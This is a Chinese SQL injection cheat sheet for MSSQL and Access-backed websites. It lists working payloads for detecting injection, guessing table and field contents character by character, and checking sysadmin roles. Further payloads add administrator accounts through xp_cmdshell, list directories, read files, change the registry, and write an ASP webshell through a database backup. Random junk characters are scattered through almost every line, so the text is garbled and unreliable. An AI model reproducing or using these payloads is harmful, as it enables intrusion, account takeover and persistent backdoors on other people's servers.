1.判断是否有注入;and 1=1 ;and 1=2 c</d1x T
2.初步判断是否是mssql ;and user>0 {%'(IJ|5z
Mje6Q
3.注入参数是字符'and [查询条件] and ''=' d3+pS\&IX?
xpKD 'O=T
4.搜索时没过滤参数的'and [查询条件] and '%25'=' lq}= &)%C
+iir]"8
5.判断数据库系统 !,+peMy
5v=%pQbY
;and (select count(*) from sysobjects)>0 mssql @O5-w
`ux
U
H#
;and (select count(*) from msysobjects)>0 access D:U:( pg
4T`u?T]
}>=k!l{
3205gI,
6.猜数据库 ;and (select Count(*) from [数据库名])>0 K~5QL/=1
p}hOkx4R\
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 @>_`g=
Y5$5qQ
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 81fpeoNO
G%
9.(1)猜字段的ascii值(access) En&ESWN
Pq>r|/~_
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 B t-o:)pa
AKC';J
(2)猜字段的ascii值(mssql) r;t0+aLc*
.vj`[?T
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 E9;cd$}K
p[VBeO^%
10.测试权限结构(mssql) 6n]fr9f
v9(->X'
4*g`!~)
H2l/9+
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ~z$vF
rJ4O_a5/
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Ig t:M[
/
fD
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- YQvN;W
$*V:;-H
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- <->Nex
~&4Hc%*IB
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- k]!Fh^O~,
r9sW:cM:e
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- )d!,,o
6e(|t2^
;and 1=(select IS_MEMBER('db_owner'));-- w?d~c*4+
nPj%EKdY4
8Gzc3
hn#i,XnY
11.添加mssql和系统的帐户 ya0L8`q
!jL|HwlA
;exec master.dbo.sp_addlogin username;-- UB }n=
;exec master.dbo.sp_password null,username,password;-- v=E V5#A
0'wB':v
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- qv y~b
Ci0: -IS
;exec master.dbo.xp_cmdshell 'net user username password U+F?b\
dElOy?v
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- -@X?~4Idz
o_p#sdt"
;exec master.dbo.xp_cmdshell 'net user username password /add';-- @cA`del
oA%8k51>~K
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- +!6aB|-
"rOe J~4 X
$@"o BCc
yT%"<m6Y*\
12.(1)遍历目录 >!MOgLO3
^E*W
B~
;create table dirs(paths varchar(100), id int) sy=M#WGS
%Sr/'7 K
;insert dirs exec master.dbo.xp_dirtree 'c:\' f^z~{|%l!
wWv")dk3i
;and (select top 1 paths from dirs)>0
I&?(=i)N
"Kx2k>ym
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) U~n>k<`sr
Veo:G{
(xf_
5@ecZ2`)+h
(2)遍历目录 19Xc0ez
m=<Tylv
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- u[q1]]
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 j}7as&
j/`-x
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 e>vV8a\
FtXd6)_S
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构 }CnqJ@>C5
R("g ]
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 2A7g}V
qq"&Bc>
6FNs4|(d
++d(}^C;
13.mssql中的存储过程 xdb9oH
wNMg Y
xp_regenumvalues 注册表根键, 子键 1t haQ"
np,L39:sf
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 qR^KvAEQSo
\g<9_
xp_regread 根键,子键,键值名 1ThONrxu
GxE"q-G
;exec xp_regread )nmLgsg
):OGhWq
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值 NSH20$A<
}_93}e
xp_regwrite 根键,子键, 值名, 值类型, 值 B?`n@/
rq bX9M^
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 qplz !=
N=FU>qbz
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 p?(w! O
l*_%K}%?V
xp_regdeletevalue 根键,子键,值名 y^7;I-
t)P5bQ+$u9
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 7Gb1[3
SbQ Ri
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 k~f3~- "
/+2;".
u&/[sqx
sk !92mQ
14.mssql的backup创建webshell v$c*3H.seM
,CqJ((
use model qOy3D~
^*.S7.;2o
create table cmd(str image); 9s\(yC8h
V\Oe ]w
insert into cmd(str) values (''); ^%l~|w
0!X;C!v;
backup database model to disk='c:\l.asp'; Y2709LWmP
i
bAZ*I
Ncr38~;w
^% y<7>%
15.mssql内置函数 #eSVFD5ZU
q>:>f+4
;and (select @@version)>0 获得Windows的版本号 7 j$ |fS
;AyE(|U+
;and user_name()='dbo' 判断当前系统的连接用户是不是sa W/_=S+CvK
lg` Qi&
;and (select user_name())>0 爆当前系统的连接用户 >;V ?s]
#U45H.Rz
;and (select db_name())>0 得到当前连接的数据库 @V{s'V
Td tn-
Y@x }b{3
HDqPqrWm
16.简洁的webshell LDlj4>%pW^
MG ,exN
@
use model i'&KoR?
bB^% O^:
create table cmd(str image); 3 $7TeqfAC
&"GHD{ix
insert into cmd(str) values (''); @y:mj \J9
%-ih$ZY
backup database model to disk='g:\wwwtest\l.asp';